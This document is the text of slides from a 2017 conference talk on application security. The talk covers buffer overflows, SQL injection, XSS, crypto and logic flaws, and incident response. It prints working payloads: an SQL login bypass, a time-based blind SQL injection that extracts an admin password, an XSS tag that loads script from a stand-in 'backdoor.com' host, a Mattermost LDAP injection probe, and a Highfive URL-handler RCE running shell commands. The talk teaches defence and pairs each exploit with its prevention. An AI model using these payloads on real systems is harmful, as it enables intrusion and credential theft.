AOEconf17 talk "Application Security" by Bastian Ike.

1. Application Security
AOE Conf 2017

2. What is
Application Security?

3. Application Security
• Security in software
• Not management security, perimeter security, etc
• Possible Attack vectors
• How to prevent issues

4. Attack vectors

5. Code Execution
Make a system execute arbitrary code

6. Buffer Overflows
• Assembler code injected into memory
• 1996, Aleph One, "Smashing the stack for fun and profit"
• Possible by overflowing a programs memory with
controlled data

7. SQL Injection
• Execute arbitrary SQL code
• Possible by interpolating user-submitted data without
proper escaping
• Can be used to read/write files on DB server

8. Cross Site Scripting
• Execute arbitrary JavaScript in a privileged context
• Executed on a client's machine
• Privileged context: Browser (domain/cookies)
• Steal/Modify cookies
• AJAX Requests to privileged areas

9. Cryptography
Attack cryptographic measures for confidentiality and
integrity

10. Signatures
• Fake signatures/tokens for unauthorised access

11. Encryption
• Break encryption
• Missing encryption
• Broken Encryption:
• Example: Bleichenbacher RSA

12. Business Logic
Make legit code behave in an unintended way

13. Race Conditions
• Re-order execution flows to change an operations result

14. Exploit basics

15. SQL Injection
• Query: SELECT * FROM users WHERE
username="${USERNAME}" AND
password="${PASSWORD}";
• Username: Bastian
• Passwort: Sesame098
• Query: SELECT * FROM users WHERE
username="Bastian" AND
password="Sesame098";

16. SQL Injection
• Query: SELECT * FROM users WHERE
username="${USERNAME}" AND
password="${PASSWORD}";
• Username: Bastian
• Passwort: " OR 1=1 -- x
• Query: SELECT * FROM users WHERE
username="Bastian" AND
password="" OR 1=1 -- x";

17. SQL Injection
• Query: SELECT * FROM logs WHERE
token="${TOKEN}";
• Token: a" AND IF(SUBSTRING(
(SELECT password FROM users WHERE
name="admin" LIMIT 1)
,0,1) = 'a', SLEEP(5), 0) -- x
• Query: SELECT * FROM logs WHERE
token="a" AND IF(SUBSTRING(
(SELECT password FROM users WHERE
name="admin" LIMIT 1)
,0,1) = 'a', SLEEP(5), 0) -- x";

18. Cross-Site Scripting
• Template: <a href="${page}">You are here</a>
• URL: http://example.com/page=hello
• Template: <a href="hello">You are here</a>

19. Cross-Site Scripting
• Template: <a href="${page}">You are here</a>
• URL: http://example.com/page="><script
src="http://backdoor.com/x.js"></script>
• Template: <a href=""><script src="http://
backdoor.com/x.js"></script>">You are
here</a>

20. Cross-Site Scripting
• Code runs in Browser of the one opening the link
• Access to Cookies+LocalStorage
• Can send requests and read their result (emulate
administrator behaviour)
• Change page look/behaviour (steal passwords, etc)

21. Exploits samples

22. Mattermost LDAP Injection
• https://mattermost/api/v3/users/login
• login_id: username)(givenName=test*
• password: ""
• Response:
• 401: OK, query successful
• 50x: Error, query failed

23. Mattermost LDAP Injection

24. Mattermost LDAP Injection

25. Mattermost LDAP Injection

26. Mattermost LDAP Injection
• Prevention: properly escape characters which might be
interpreted by LDAP

27. Highfive RCE
• Target: URL-Handler highfive://
• Possible arguments: ?domain=, ?protocol=

28. Highfive RCE
Privileged
Non-Privileged Display Web-pages
Execute processes etc
Highfive Sandbox (NW.js)
Whitelist:
https://highfive.com
https://dev.highfive.com

29. Highfive RCE
• highfive://test.com.a/?
domain=alert(require('child_process').execSyn
c('hostname;echo;id').toString())//
&protocol=javascript
• Starts Highfive on a privileged initial domain
• Redirects to: protocol + '://' + domain + path
• Becomes:
javascript://
alert(require('child_process').execSync('host
name;echo;id').toString())//something

30. Highfive RCE
• Redirect to javascript:// does not change the
sandbox
• Works on any operating system
• Thank you JavaScript 😙

31. Highfive RCE
• Prevention: whitelist redirect targets

32. JWT Null Tokens

33. JWT Null Tokens

34. JWT Null Tokens

35. JWT Null Tokens

36. JWT Null Tokens
• Prevention: Do not allow null signature algorithms

37. Preventive actions

38. Finding Security issues
• Code Reviews
• Curiosity
• (sometimes: automated scanners)

39. Stay up to date

40. React fast

41. React fast
• Escalation plan for security incidents
• Fast deployment strategies
• Firewall setup to cut off possible infected systems
• Snapshot infrastructure for later analysis

42. Thank you :)
Questions?